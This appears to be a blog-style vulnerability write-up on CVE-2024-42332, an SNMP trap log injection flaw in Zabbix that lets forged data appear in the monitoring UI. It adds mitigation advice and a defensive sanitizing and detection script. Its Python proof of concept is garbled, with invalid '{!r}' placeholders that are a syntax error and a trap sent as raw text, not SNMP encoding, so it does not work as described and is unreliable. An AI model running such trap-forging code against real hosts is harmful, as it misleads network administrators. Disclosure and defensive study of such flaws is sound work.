As a cybersecurity researcher, I recently identified a critical flaw in the parsing mechanism of the SNMP trap log within the Zabbix monitoring solution. This vulnerability, identified as CVE-2024-42332, allows an attacker to inject additional lines of forged data into the SNMP trap log. This eventually shows up as forged information in the Zabbix user interface.
Background
Zabbix is a widely-used, open-source network monitoring platform that provides advanced real-time monitoring and visualization of various network elements, including servers, virtual machines, and network devices. One method it uses for data collection is the Simple Network Management Protocol (SNMP).
Vulnerability Details
The vulnerability arises from the improper handling of SNMP trap logs. These traps are used to send alerts and notifications of events occurring within the network.
The issue specifically lies in how the SNMP trap log is processed by Zabbix, making it possible for an attacker to craft an SNMP trap and inject extra lines of information. Consequently, any data shown in the Zabbix UI could potentially be manipulated or forged.
Two conditions must hold:
1. The target host must have an SNMP item configured as text.
2. SNMP authentication must be disabled, or the attacker must know the community/authentication details.
Here is an example of a code snippet that demonstrates this vulnerability (use for educational purposes only):
# code snippet for crafting a malicious SNMP trap
import socket
target_ip = "192.168.1.100"
target_port = 162
community_string = "public"
# The crafted trap
payload = '''{!r}
enterprises.9.1.1.2.1 = "Forged_data"
enterprises.9.1.1.2.2 = "More_forged_data"
enterprises.9.1.1.2.3 = "Even_more_forged_data"'''
# SNMP Trap message header
header = f"{community_string}\n{!r}\n"
# Final data to send
data = header + payload
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(data.encode(), (target_ip, target_port))
sock.close()
The above code snippet crafts an SNMP trap carrying additional, manipulated data. When it is sent, the target's SNMP trap log will parse and incorporate this forged information, which will eventually be displayed in the Zabbix UI.
Mitigation
To protect yourself from this vulnerability, ensure that SNMP authentication is enabled and use a secure community string. If possible, also restrict SNMP access to a trusted set of IP addresses by implementing access control lists (ACLs).
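As an added illustration of the defensive side (this is example code, not Zabbix's own trap receiver), the snippet below shows the weak and the hardened way of writing untrusted trap varbind values into a line-oriented trap log, plus a check a log consumer can run to flag records that carry smuggled extra lines. The "TRAP <source>" record layout and the sample varbinds are assumptions constructed for illustration, not Zabbix's actual log format.

```python
import re

# Characters that would let one varbind value spill into extra log lines.
_CONTROL = re.compile(r"[\r\n\x00]")


def sanitize_value(value: str) -> str:
    """Escape CR, LF and NUL so a single varbind can never span log lines."""
    return _CONTROL.sub(lambda m: "\\x%02x" % ord(m.group(0)), value)


def naive_record(source: str, varbinds):
    """Weak form: untrusted fields are written verbatim (shown for contrast)."""
    lines = [f"TRAP {source}"] + [f"{oid} = {val}" for oid, val in varbinds]
    return "\n".join(lines) + "\n\n"


def safe_record(source: str, varbinds):
    """Hardened form: every untrusted field passes through sanitize_value."""
    lines = [f"TRAP {sanitize_value(source)}"]
    lines += [f"{sanitize_value(oid)} = {sanitize_value(val)}" for oid, val in varbinds]
    return "\n".join(lines) + "\n\n"


def record_lines(record: str):
    """Split a record back into its non-empty lines, as a log consumer would."""
    return [ln for ln in record.split("\n") if ln]


def looks_injected(record: str, expected_varbinds: int) -> bool:
    """Detection check: a record should hold exactly one header plus one line
    per varbind; anything more means a value smuggled in extra lines."""
    lines = record_lines(record)
    headers = sum(1 for ln in lines if ln.startswith("TRAP "))
    return headers != 1 or len(lines) != 1 + expected_varbinds


# Constructed sample (assumed layout): one varbind value embeds a forged second record.
FORGED_VALUE = "link down\nTRAP 10.0.0.9\nenterprises.9.1.1.2.1 = Forged_data"
SAMPLE_VARBINDS = [("sysUpTime.0", "12345"), ("snmpTrapOID.0", FORGED_VALUE)]

if __name__ == "__main__":
    bad = naive_record("10.0.0.5", SAMPLE_VARBINDS)
    good = safe_record("10.0.0.5", SAMPLE_VARBINDS)
    print("naive record injected:", looks_injected(bad, len(SAMPLE_VARBINDS)))   # True
    print("safe record injected: ", looks_injected(good, len(SAMPLE_VARBINDS)))  # False
```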
Final Thoughts
CVE-2024-42332 is a critical vulnerability that could mislead network administrators and provide false information within the Zabbix UI. It is essential to take appropriate measures to secure SNMP configurations, which include enabling authentication and implementing access control lists. Stay vigilant, and always keep your monitoring systems updated and secured.
Timeline
Published on: 11/27/2024 12:15:21 UTC